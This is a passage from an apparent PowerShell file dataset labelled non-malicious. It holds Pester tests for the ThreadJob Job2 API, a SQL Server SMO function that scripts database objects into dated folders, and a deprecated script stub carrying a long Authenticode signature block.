$result | Should -Be "FullLanguage"
}
}
Describe 'Job2 class API tests' -Tags 'CI' {
AfterEach {
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
}
It 'Verifies StopJob API' {
$job = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 5
Wait-ForJobRunning $job
$job.StopJob($true, "No Reason")
$job.JobStateInfo.State | Should -Be "Stopped"
}
It 'Verifies StopJobAsync API' {
$job = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 5
Wait-ForJobRunning $job
$job.StopJobAsync($true, "No Reason")
Wait-Job $job
$job.JobStateInfo.State | Should -Be "Stopped"
}
It 'Verifies StartJobAsync API' {
$jobRunning = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 1
$jobNotRunning = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
$jobNotRunning.JobStateInfo.State | Should -Be "NotStarted"
$jobNotRunning.StartJobAsync()
Wait-ForJobRunning $jobNotRunning
$jobNotRunning.JobStateInfo.State | Should -Be "Running"
}
It 'Verifies JobSourceAdapter Get-Jobs' {
$job = Start-ThreadJob -ScriptBlock { "Hello" } | Wait-Job
$getJob = Get-Job -InstanceId $job.InstanceId 2> $null
$getJob | Should -Be $job
$getJob = Get-Job -Name $job.Name 2> $null
$getJob | Should -Be $job
$getJob = Get-Job -Command ' "hello" ' 2> $null
$getJob | Should -Be $job
$getJob = Get-Job -State $job.JobStateInfo.State 2> $null
$getJob | Should -Be $job
$getJob = Get-Job -Id $job.Id 2> $null
$getJob | Should -Be $job
$result = Get-Job -Filter @{Id = ($job.Id)} 3> $null
$result | Should -BeNullOrEmpty
}
It 'Verifies terminating job error' {
$job = Start-ThreadJob -ScriptBlock { throw "My Job Error!" } | Wait-Job
$results = $job | Receive-Job 2>&1
$results.ToString() | Should -Be "My Job Error!"
}
}
|
combined_dataset/train/non-malicious/2597.ps1
|
2597.ps1
|
function global:Script-DBObjectsIntoFolders([string]$server, [string]$dbname){
[System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SMO") | out-null
$SMOserver = New-Object (’Microsoft.SqlServer.Management.Smo.Server’) -argumentlist $server
$db = $SMOserver.databases[$dbname]
$Objects = $db.Tables
$Objects += $db.Views
$Objects += $db.StoredProcedures
$Objects += $db.UserDefinedFunctions
$Objects += $db.Schemas
$Objects += $db.Triggers
$SavePath = "E:\Dexma\Temp\Databases\" + $($dbname)
$DateFolder = get-date -format yyyyMMddHHmm
new-item -type directory -name "$DateFolder"-path "$SavePath"
foreach ($ScriptThis in $Objects | where {!($_.IsSystemObject)}) {
$scriptr = new-object ('Microsoft.SqlServer.Management.Smo.Scripter') ($SMOserver)
$scriptr.Options.AppendToFile = $True
$scriptr.Options.AllowSystemObjects = $False
$scriptr.Options.ClusteredIndexes = $True
$scriptr.Options.DriAll = $True
$scriptr.Options.ScriptDrops = $False
$scriptr.Options.IncludeHeaders = $True
$scriptr.Options.ToFileOnly = $True
$scriptr.Options.Indexes = $True
$scriptr.Options.Permissions = $True
$scriptr.Options.WithDependencies = $False
$ScriptDrop = new-object ('Microsoft.SqlServer.Management.Smo.Scripter') ($SMOserver)
$ScriptDrop.Options.AppendToFile = $True
$ScriptDrop.Options.AllowSystemObjects = $False
$ScriptDrop.Options.ClusteredIndexes = $True
$ScriptDrop.Options.DriAll = $True
$ScriptDrop.Options.ScriptDrops = $True
$ScriptDrop.Options.IncludeHeaders = $True
$ScriptDrop.Options.ToFileOnly = $True
$ScriptDrop.Options.Indexes = $True
$ScriptDrop.Options.WithDependencies = $False
$TypeFolder=$ScriptThis.GetType().Name
if ((Test-Path -Path "$SavePath\$DateFolder\$TypeFolder") -eq "true") `
{"Scripting Out $TypeFolder $ScriptThis"} `
else {new-item -type directory -name "$TypeFolder"-path "$SavePath\$DateFolder"}
$ScriptFile = $ScriptThis -replace "\[|\]"
$ScriptDrop.Options.FileName = "" + $($SavePath) + "\" + $($DateFolder) + "\" + $($TypeFolder) + "\" + $($ScriptFile) + ".SQL"
$scriptr.Options.FileName = "$SavePath\$DateFolder\$TypeFolder\$ScriptFile.SQL"
IF ($ScriptThis.GetType().Name -NE "Table") { $ScriptDrop.Script($ScriptThis) }
$scriptr.Script($ScriptThis)
}
}
Script-DBObjectsIntoFolders "XSQLUTIL19" "CitizensFirst_NdxTest"
|
combined_dataset/train/non-malicious/sample_20_76.ps1
|
sample_20_76.ps1
|
'This script has been deprecated. Please use the PowerShell version TS_Virtualization.ps1
'' SIG '' Begin signature block
'' SIG '' MIIoUAYJKoZIhvcNAQcCoIIoQTCCKD0CAQExDzANBglg
'' SIG '' hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor
'' SIG '' BgEEAYI3AgEeMCQCAQEEEE7wKRaZJ7VNj+Ws4Q8X66sC
'' SIG '' AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg
'' SIG '' 9GrSZqZ7yd3ColGjrbQUtEE+NyBkMfBBz6rN4EUp6u2g
'' SIG '' gg2FMIIGAzCCA+ugAwIBAgITMwAABAO91ZVdDzsYrQAA
'' SIG '' AAAEAzANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV
'' SIG '' UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
'' SIG '' UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
'' SIG '' cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT
'' SIG '' aWduaW5nIFBDQSAyMDExMB4XDTI0MDkxMjIwMTExM1oX
'' SIG '' DTI1MDkxMTIwMTExM1owdDELMAkGA1UEBhMCVVMxEzAR
'' SIG '' BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
'' SIG '' bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
'' SIG '' bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
'' SIG '' MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
'' SIG '' n3RnXcCDp20WFMoNNzt4s9fV12T5roRJlv+bshDfvJoM
'' SIG '' ZfhyRnixgUfGAbrRlS1St/EcXFXD2MhRkF3CnMYIoeMO
'' SIG '' MuMyYtxr2sC2B5bDRMUMM/r9I4GP2nowUthCWKFIS1RP
'' SIG '' lM0YoVfKKMaH7bJii29sW+waBUulAKN2c+Gn5znaiOxR
'' SIG '' qIu4OL8f9DCHYpME5+Teek3SL95sH5GQhZq7CqTdM0fB
'' SIG '' w/FmLLx98SpBu7v8XapoTz6jJpyNozhcP/59mi/Fu4tT
'' SIG '' 2rI2vD50Vx/0GlR9DNZ2py/iyPU7DG/3p1n1zluuRp3u
'' SIG '' XKjDfVKH7xDbXcMBJid22a3CPbuC2QJLowIDAQABo4IB
'' SIG '' gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB
'' SIG '' BQUHAwMwHQYDVR0OBBYEFOpuKgJKc+OuNYitoqxfHlrE
'' SIG '' gXAZMFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy
'' SIG '' b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx
'' SIG '' FjAUBgNVBAUTDTIzMDAxMis1MDI5MjYwHwYDVR0jBBgw
'' SIG '' FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w
'' SIG '' SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
'' SIG '' L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx
'' SIG '' LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB
'' SIG '' BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w
'' SIG '' a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx
'' SIG '' LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3
'' SIG '' DQEBCwUAA4ICAQBRaP+hOC1+dSKhbqCr1LIvNEMrRiOQ
'' SIG '' EkPc7D6QWtM+/IbrYiXesNeeCZHCMf3+6xASuDYQ+AyB
'' SIG '' TX0YlXSOxGnBLOzgEukBxezbfnhUTTk7YB2/TxMUcuBC
'' SIG '' P45zMM0CVTaJE8btloB6/3wbFrOhvQHCILx41jTd6kUq
'' SIG '' 4bIBHah3NG0Q1H/FCCwHRGTjAbyiwq5n/pCTxLz5XYCu
'' SIG '' 4RTvy/ZJnFXuuwZynowyju90muegCToTOwpHgE6yRcTv
'' SIG '' Ri16LKCr68Ab8p8QINfFvqWoEwJCXn853rlkpp4k7qzw
'' SIG '' lBNiZ71uw2pbzjQzrRtNbCFQAfmoTtsHFD2tmZvQIg1Q
'' SIG '' VkzM/V1KCjHL54ItqKm7Ay4WyvqWK0VIEaTbdMtbMWbF
'' SIG '' zq2hkRfJTNnFr7RJFeVC/k0DNaab+bpwx5FvCUvkJ3z2
'' SIG '' wfHWVUckZjEOGmP7cecefrF+rHpif/xW4nJUjMUiPsyD
'' SIG '' btY2Hq3VMLgovj+qe0pkJgpYQzPukPm7RNhbabFNFvq+
'' SIG '' kXWBX/z/pyuo9qLZfTb697Vi7vll5s/DBjPtfMpyfpWG
'' SIG '' 0phVnAI+0mM4gH09LCMJUERZMgu9bbCGVIQR7cT5YhlL
'' SIG '' t+tpSDtC6XtAzq4PJbKZxFjpB5wk+SRJ1gm87olbfEV9
'' SIG '' SFdO7iL3jWbjgVi1Qs1iYxBmvh4WhLWr48uouzCCB3ow
'' SIG '' ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL
'' SIG '' BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
'' SIG '' aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK
'' SIG '' ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT
'' SIG '' KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv
'' SIG '' cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw
'' SIG '' ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT
'' SIG '' Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
'' SIG '' BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG
'' SIG '' A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg
'' SIG '' MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC
'' SIG '' ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq
'' SIG '' uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ
'' SIG '' DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X
'' SIG '' llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL
'' SIG '' bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5
'' SIG '' pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt
'' SIG '' 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3
'' SIG '' Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP
'' SIG '' rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl
'' SIG '' mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE
'' SIG '' tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9
'' SIG '' G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C
'' SIG '' HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp
'' SIG '' pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A
'' SIG '' N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE
'' SIG '' 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB
'' SIG '' 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k
'' SIG '' 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe
'' SIG '' CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB
'' SIG '' /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h
'' SIG '' 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov
'' SIG '' L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj
'' SIG '' dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy
'' SIG '' bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0
'' SIG '' dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv
'' SIG '' TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB
'' SIG '' nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI
'' SIG '' KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv
'' SIG '' bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr
'' SIG '' BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp
'' SIG '' AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq
'' SIG '' hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW
'' SIG '' EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H
'' SIG '' qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS
'' SIG '' 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m
'' SIG '' kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj
'' SIG '' HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO
'' SIG '' r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat
'' SIG '' ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n
'' SIG '' t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA
'' SIG '' KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj
'' SIG '' Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv
'' SIG '' 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3
'' SIG '' HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs
'' SIG '' 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991
'' SIG '' bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib
'' SIG '' V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x
'' SIG '' ghojMIIaHwIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG
'' SIG '' A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
'' SIG '' ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
'' SIG '' MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n
'' SIG '' IFBDQSAyMDExAhMzAAAEA73VlV0POxitAAAAAAQDMA0G
'' SIG '' CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor
'' SIG '' BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE
'' SIG '' AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCD18Oa3LC1fqUFN
'' SIG '' MI90LtLKd0TUh6c2npkhdpCHjHQLbTBCBgorBgEEAYI3
'' SIG '' AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY
'' SIG '' aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3
'' SIG '' DQEBAQUABIIBAHiyqzBY8u8MQH059PMpL80xjzzOHO/i
'' SIG '' hKLdX8UAKtl14uRw9GtQV/aW+U4CIeQcCzT96/BazyYQ
'' SIG '' DGhNjZ2ZlKcPPqLK8gDyzaY89XLp598TcWy7Cpn42HUH
'' SIG '' a37U8m09q7mBFnduosbxYg3md1TkPygMUqv+onntAYTd
'' SIG '' /RjRw7fMxqrzXYuy4W406ZCp+7xDimosM2cj/0GPqix5
'' SIG '' d7YSTjj/jNGnxkKUnrEtZDzvO2J1OZhhhzWWjKALC8Kl
'' SIG '' f8l1HpfY+cRaOKlz6sAv2w8jz4FG+AFfDyRwAjyXyof8
'' SIG '' YoAJgH4LZOiNI8p+60lw7YSibyQ1z1zP3sqf0AAf8Dxl
'' SIG '' /1mhghetMIIXqQYKKwYBBAGCNwMDATGCF5kwgheVBgkq
'' SIG '' hkiG9w0BBwKggheGMIIXggIBAzEPMA0GCWCGSAFlAwQC
'' SIG '' AQUAMIIBWgYLKoZIhvcNAQkQAQSgggFJBIIBRTCCAUEC
'' SIG '' AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg
'' SIG '' GnHIl0LIhfCrhIUbss3CbglNsi9WlS0lSWcZCNep7IwC
'' SIG '' Bmb/GX4R/RgTMjAyNDEwMjgxMTQwNDMuODE1WjAEgAIB
'' SIG '' 9KCB2aSB1jCB0zELMAkGA1UEBhMCVVMxEzARBgNVBAgT
'' SIG '' Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
'' SIG '' BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsG
'' SIG '' A1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9u
'' SIG '' cyBMaW1pdGVkMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBF
'' SIG '' U046NkIwNS0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jv
'' SIG '' c29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghH7MIIHKDCC
'' SIG '' BRCgAwIBAgITMwAAAfaDLyZqVF0iwQABAAAB9jANBgkq
'' SIG '' hkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UE
'' SIG '' CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe
'' SIG '' MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYw
'' SIG '' JAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0Eg
'' SIG '' MjAxMDAeFw0yNDA3MjUxODMxMDRaFw0yNTEwMjIxODMx
'' SIG '' MDRaMIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
'' SIG '' aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
'' SIG '' ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
'' SIG '' EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExp
'' SIG '' bWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVTTjo2
'' SIG '' QjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0
'' SIG '' IFRpbWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcN
'' SIG '' AQEBBQADggIPADCCAgoCggIBANFCXizEfzfVjwWYbilR
'' SIG '' RfnliWevFro3Y+F+iUdOXMTuQnqTV6Ne61Ws8Fi5JuQI
'' SIG '' 2lYdfWVYwwoR84psbKGl8TbvCA4ICsKV76QACLb+FMed
'' SIG '' HvUtrlcHyr+e6fSShvkO1TjUobo5dTQjJHIEqz3Znf/M
'' SIG '' 3LJoc3DaGy6JqwgCDkWfCMIWMuLIlUJX9TSoZcgM5pFi
'' SIG '' Q9DfutCIqIBQc4N8iErL66DsdMdcUotj4kSEJU1xO+DI
'' SIG '' IGQyAyqh/4W/RU9pCv51f2l47qPSzK60Zp+OKGGAA3v6
'' SIG '' zveRfkht7rroX/h+CK4l69IfabQOksByT0tlZmzVgo0F
'' SIG '' quRuGJK3KmzzGse7zV1MLu0+uRPHxT3dSLhPUbBuEzAF
'' SIG '' e15FwaKZjzX7y9IY8YOOJKUJ9/OFeOqPs3UKsuSvXQ5V
'' SIG '' pvyer2baecgNT8g98Ph2xrm0tJ4hENS+sBjqz38yJtBX
'' SIG '' Tp/sRaOPBEZfhccP9zr1zOQmNRKp8xM5z48yXOzicISV
'' SIG '' Ud1UAx4wXBBUzr0vRNHYjbtXqHMPmQpM+D7v6EL/oKlP
'' SIG '' m38S/HuzxZLX0Q5TOhcjs4z+M7iNuYA/LTvcyYOoOn0a
'' SIG '' WmXON/ZgG5Jd8wlc0yw4HIb+ksUGoybb76EGmcUH9LUY
'' SIG '' j3G69h1nzKKqnfbokNIU1BIRuOBQUk3lD2XhHp0QlmnQ
'' SIG '' luBvAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUSMGbCbjn
'' SIG '' CX0nD1nF2bgQOAfPSvIwHwYDVR0jBBgwFoAUn6cVXQBe
'' SIG '' Yl2D9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZO
'' SIG '' aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
'' SIG '' cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
'' SIG '' MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggr
'' SIG '' BgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
'' SIG '' L3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0
'' SIG '' YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/
'' SIG '' BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNV
'' SIG '' HQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANd5
'' SIG '' AYqx9XB7tVmEdcrI9duaJhrUND2kJBM8Bm+9MbakqCPr
'' SIG '' L0IobIHU2MWj36diFRXYI2jGgYvNcAfP57vOuhXxSinY
'' SIG '' Xad8JzGfdT6T+DqHuzXH+qiApIErsIHSHUL6hNIfFUOU
'' SIG '' FubA1eENCZ4+H+yh2MeDYjPAuI08PEkLbLsVokx9h4pH
'' SIG '' 90GAe9Wu3Qfc4BzpFtIYFBHljvZodsFqmEv0OPAEozqm
'' SIG '' MP4WueKFTn39tlmqB/vx8XfTUxFP+L5b7ESDFk9I7JzS
'' SIG '' O9Y1QK0+EPQbelUoVs8qq2hOkilKGaxMAaVbCNCzINl9
'' SIG '' 4Ti25Qtb8TN/sDMjofe2hTrO7BZ7nprSNjH4/KoNegWU
'' SIG '' ycV5aT7q1qxvjgY+AaEw5AvQMV2Ad8hLbsDLO6UVi8sS
'' SIG '' McP8FfUxylBpvsflRNDzi8JK0jII7pUl5KXxCx1loglb
'' SIG '' JSWxSCAf+AJb/o0CUigCbqPQhK25tqng5P84yWJWGlRj
'' SIG '' MirmGfrkkVSgdqpBD3BMxtXTvcyGtTKd9ifs81tz+7Li
'' SIG '' X48OtrN4Qzi5PupTEDkdOMftqNexty3Hi5JMSZuNRK3Y
'' SIG '' k4wJnQpXp/cpeh4DKRkuKJIxQiV/gqThV+4AQNz1cUFr
'' SIG '' m4rAEGy+R4ExQbUDRM3AnYdRmMP+p88zTbftBkJ56GwX
'' SIG '' XXzgIqpM7yLal47xsitUMIIHcTCCBVmgAwIBAgITMwAA
'' SIG '' ABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCB
'' SIG '' iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
'' SIG '' b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p
'' SIG '' Y3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWlj
'' SIG '' cm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
'' SIG '' IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgz
'' SIG '' MjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
'' SIG '' aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
'' SIG '' ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
'' SIG '' Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC
'' SIG '' AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOTh
'' SIG '' pkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2
'' SIG '' AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYj
'' SIG '' DLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFE
'' SIG '' yHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2
'' SIG '' vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6O
'' SIG '' U8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUo
'' SIG '' veO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvr
'' SIG '' g0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdb
'' SIG '' Z2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZ
'' SIG '' nkXftnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZN
'' SIG '' N3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEz
'' SIG '' OUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMY
'' SIG '' ctenIPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5
'' SIG '' C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
'' SIG '' bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a
'' SIG '' j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkr
'' SIG '' BgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQq
'' SIG '' p1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cV
'' SIG '' XQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwr
'' SIG '' BgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDov
'' SIG '' L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1Jl
'' SIG '' cG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMI
'' SIG '' MBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1Ud
'' SIG '' DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQY
'' SIG '' MBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRP
'' SIG '' ME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNv
'' SIG '' bS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8y
'' SIG '' MDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYI
'' SIG '' KwYBBQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNv
'' SIG '' bS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
'' SIG '' MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h
'' SIG '' LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnX
'' SIG '' wnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03d
'' SIG '' mLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27Y
'' SIG '' P0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfak
'' SIG '' Vqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8
'' SIG '' F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4s
'' SIG '' a3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6
'' SIG '' MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1A
'' SIG '' PMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lU
'' SIG '' ZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtq
'' SIG '' RRFHqfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4K
'' SIG '' u+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLB
